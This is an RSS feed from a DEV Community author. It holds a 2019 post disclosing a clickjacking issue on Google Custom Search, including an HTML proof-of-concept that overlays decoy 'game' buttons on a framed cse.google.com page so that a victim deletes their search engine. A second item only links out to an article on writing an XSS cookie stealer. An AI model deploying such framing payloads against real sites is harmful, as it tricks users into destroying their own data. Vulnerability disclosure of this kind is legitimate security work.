<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Abay</title>
    <description>The latest articles on DEV Community by Abay (@kustirama).</description>
    <link>https://dev.to/kustirama</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F115144%2F2f379a00-036e-46d6-a29d-22cb03726d42.jpeg</url>
      <title>DEV Community: Abay</title>
      <link>https://dev.to/kustirama</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kustirama"/>
    <language>en</language>
    <item>
      <title>Clickjacking on Google CSE. Is this Important?</title>
      <dc:creator>Abay</dc:creator>
      <pubDate>Sat, 09 Feb 2019 21:06:01 +0000</pubDate>
      <link>https://dev.to/kustirama/clickjacking-on-google-cse-is-this-important-3bdk</link>
      <guid>https://dev.to/kustirama/clickjacking-on-google-cse-is-this-important-3bdk</guid>
      <description>&lt;p&gt;While i was testing i found that cse.google.com is vulnerable to clickjacking so i checked if the settings page is vulnerable or not and it was vulnerable so now this has a risk! The attacker could delete someone's CSE.&lt;/p&gt;

&lt;p&gt;&lt;iframe class="tweet-embed" id="tweet-1094333150086320130-119" src="https://platform.twitter.com/embed/Tweet.html?id=1094333150086320130"&gt;
&lt;/iframe&gt;

  // Detect dark theme
  var iframe = document.getElementById('tweet-1094333150086320130-119');
  if (document.body.className.includes('dark-theme')) {
    iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=1094333150086320130&amp;amp;theme=dark"
  }



&lt;/p&gt;

&lt;p&gt;Summary: Attacker can delete victim's CSE.&lt;/p&gt;

&lt;p&gt;Steps to reproduce:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Go to &lt;a href="https://cse.google.com/" rel="noopener noreferrer"&gt;https://cse.google.com/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;It can be embedded into any webpage.&lt;/li&gt;
&lt;li&gt;Attacker may manipulate HTML template so it can delete victim's CSE.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;I wrote an exploit code for clickjacking and here is the exploit code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;center&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;div&lt;/span&gt; &lt;span class="na"&gt;style=&lt;/span&gt;&lt;span class="s"&gt;"position: absolute; left: 100px; top: 10px;"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;h3&amp;gt;&lt;/span&gt;Let's consider this is a game!&lt;span class="nt"&gt;&amp;lt;/h3&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;div&lt;/span&gt; &lt;span class="na"&gt;style=&lt;/span&gt;&lt;span class="s"&gt;"position: absolute; left: 100px; top: 40px;"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;h3&amp;gt;&lt;/span&gt;To finish it, you have to press the keys in sequence.&lt;span class="nt"&gt;&amp;lt;/h3&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;div&lt;/span&gt; &lt;span class="na"&gt;style=&lt;/span&gt;&lt;span class="s"&gt;"position: absolute; left: 205px; top: 278px; color: red;"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;button&amp;gt;&lt;/span&gt;1&lt;span class="nt"&gt;&amp;lt;/button&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;div&lt;/span&gt; &lt;span class="na"&gt;style=&lt;/span&gt;&lt;span class="s"&gt;"position: absolute; left: 300px; top: 178px; color: red;"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;button&amp;gt;&lt;/span&gt;2&lt;span class="nt"&gt;&amp;lt;/button&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;div&lt;/span&gt; &lt;span class="na"&gt;style=&lt;/span&gt;&lt;span class="s"&gt;"position: absolute; left: 400px; top: 475px; color: red;"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;button&amp;gt;&lt;/span&gt;3&lt;span class="nt"&gt;&amp;lt;/button&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;iframe&lt;/span&gt; &lt;span class="na"&gt;style=&lt;/span&gt;&lt;span class="s"&gt;"opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;"&lt;/span&gt; &lt;span class="na"&gt;src=&lt;/span&gt;&lt;span class="s"&gt;"https://cse.google.com/"&lt;/span&gt; &lt;span class="na"&gt;width=&lt;/span&gt;&lt;span class="s"&gt;"100%"&lt;/span&gt; &lt;span class="na"&gt;height=&lt;/span&gt;&lt;span class="s"&gt;"100%"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By using Clickjacking technique, an attacker can make someone unconsciously delete their CSE.&lt;/p&gt;

&lt;p&gt;About how attacker can make someone unconsciously delete their CSE, you can check my video PoC here:&lt;br&gt;
&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/Fkzm8ZUFZ0E"&gt;
&lt;/iframe&gt;
&lt;br&gt;
Enough about the explanation.&lt;/p&gt;

&lt;p&gt;Okay, the problem has just begun. My findings above, in my opinion are valid bugs. Why? Because the attacker can delete someone's data (CSE), isn't this a bug? But the response I got was very surprising.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffnatzkdm55w8ja3opjc3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffnatzkdm55w8ja3opjc3.png" alt="Google's response about my report" width="161" height="81"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ncsy0zigpwp8k24p72x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ncsy0zigpwp8k24p72x.png" alt="Google's response about my report" width="161" height="81"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The part that makes me confused is, how is this not a bug? Because in my head it is clear that I can delete other people's data.&lt;/p&gt;

&lt;p&gt;What do you think? Is this a bug? Or is it just me who overestimates this as a bug?&lt;/p&gt;

</description>
      <category>security</category>
      <category>testing</category>
    </item>
    <item>
      <title>Write XSS Cookie Stealer</title>
      <dc:creator>Abay</dc:creator>
      <pubDate>Tue, 27 Nov 2018 22:13:11 +0000</pubDate>
      <link>https://dev.to/kustirama/write-xss-cookie-stealer-5ed1</link>
      <guid>https://dev.to/kustirama/write-xss-cookie-stealer-5ed1</guid>
      <description>&lt;p&gt;English version soon (maybe)&lt;br&gt;
&lt;a href="http://ox.metrotvnews.com/newrevive/www/delivery/ck.php?oadest=https://abaykan.com/post/membuat-xss-cookie-stealer" rel="noopener noreferrer"&gt;Write XSS Cookie Stealer&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>javascript</category>
      <category>php</category>
    </item>
  </channel>
</rss>
